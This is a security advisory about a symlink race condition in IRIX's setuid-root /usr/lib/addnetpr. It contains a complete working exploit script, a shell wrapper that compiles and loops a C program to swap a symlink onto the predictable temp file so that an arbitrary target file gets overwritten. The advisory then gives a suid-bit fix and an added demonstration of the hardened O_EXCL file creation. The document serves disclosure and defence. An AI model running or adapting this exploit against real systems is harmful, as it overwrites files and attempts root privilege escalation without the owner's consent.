COMMAND

    /usr/lib/addnetpr

SYSTEMS AFFECTED

    IRIX 5.x, 6.x

PROBLEM

    There is a race condition in /usr/lib/addnetpr, another suid root
    program for printing.  An exploit script for it follows.  Although
    the exploit was tested, it was hard to find a way to get root with
    it.  It can fill the target with the two arguments of addnetpr,
    but along with some messages that cannot be controlled.  In
    addition, addnetpr pops up a window asking for the root password
    when run by non-privileged users ("privileged" here means not
    root, but IRIX-specific privileged users).  Privileged users
    bypass the window and can run the race.  Tested on both IRIX 5.3
    and 6.2.  Credit goes to Jaechul Choe.

    #!/bin/sh

    PROG="`basename $0`"
    if [ $# -ne 1 ]; then
            echo "Usage: $PROG <target>"
            exit 1
    fi

    cat > expnetpr.c << _CREDIT_TO_ZOMO_
    void main(int argc, char *argv[])
    {
            char *template = "/var/tmp/printersXXXXXX";
            char *target;
            int pid;

            target = (char *)mktemp(template);

            if ((pid = fork()) > 0) {
                    sleep(3);
                    umask(0);
                    execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 0);
            }
            else
                    while(1) {
                            symlink(argv[1], target);
                            unlink(target);
                    }

    }
    _CREDIT_TO_ZOMO_

    /bin/cc expnetpr.c -o expnetpr
    if [ ! -f expnetpr ]; then
            echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has been installed from the IDO"
            exit 1
    fi

    while(`true`)
    do
            ./expnetpr $1&
            PID=$!
            sleep 15
            ls -al $1
            killall expnetpr
            killall addnetpr
    done

SOLUTION

    As a quick and dirty fix, strip the suid bit from the program.  The
    long-term fix should be a patch, but that is still in the future.
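
    The bug class behind this race, shown beside its hardened form, as
    an added example that is not part of the original advisory or of
    addnetpr itself.  The source of addnetpr is not on this page, so
    naive_create() is an assumed model of how it opens its temp file;
    the scratch directory, file names and written string are constructed.

```c
/* Added example, not from the advisory. addnetpr's source is not shown on
 * the page; naive_create() is an ASSUMED model of its temp-file handling. */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed vulnerable pattern: predictable name, open() follows symlinks. */
static int naive_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: O_EXCL fails with EEXIST if any entry, symlink included, exists. */
static int safe_create(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Pre-plants a symlink at the temp name inside a private scratch directory,
 * runs one creator, and returns the victim file's size afterwards (-1 on
 * setup error). The victim starts with 4 bytes; the write is 12 bytes. */
long victim_size_after(int use_safe)
{
    char dir[] = "/tmp/addnetpr-demoXXXXXX";   /* constructed scratch path */
    char victim[64], tmp[64];
    struct stat st;
    int fd;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/printers000001", dir);
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "keep", 4) != 4 || close(fd) != 0) return -1;
    if (symlink(victim, tmp) != 0) return -1;

    fd = use_safe ? safe_create(tmp) : naive_create(tmp);
    if (fd >= 0 && (write(fd, "localhost +\n", 12) != 12 || close(fd) != 0))
        return -1;
    if (stat(victim, &st) != 0) return -1;
    unlink(tmp); unlink(victim); rmdir(dir);
    return (long)st.st_size;
}

int main(void)
{
    printf("naive: victim is %ld bytes\n", victim_size_after(0));
    printf("safe:  victim is %ld bytes\n", victim_size_after(1));
    return 0;
}
```

    mkstemp() performs the same exclusive create with an unpredictable
    name in one call, which is the usual replacement for mktemp().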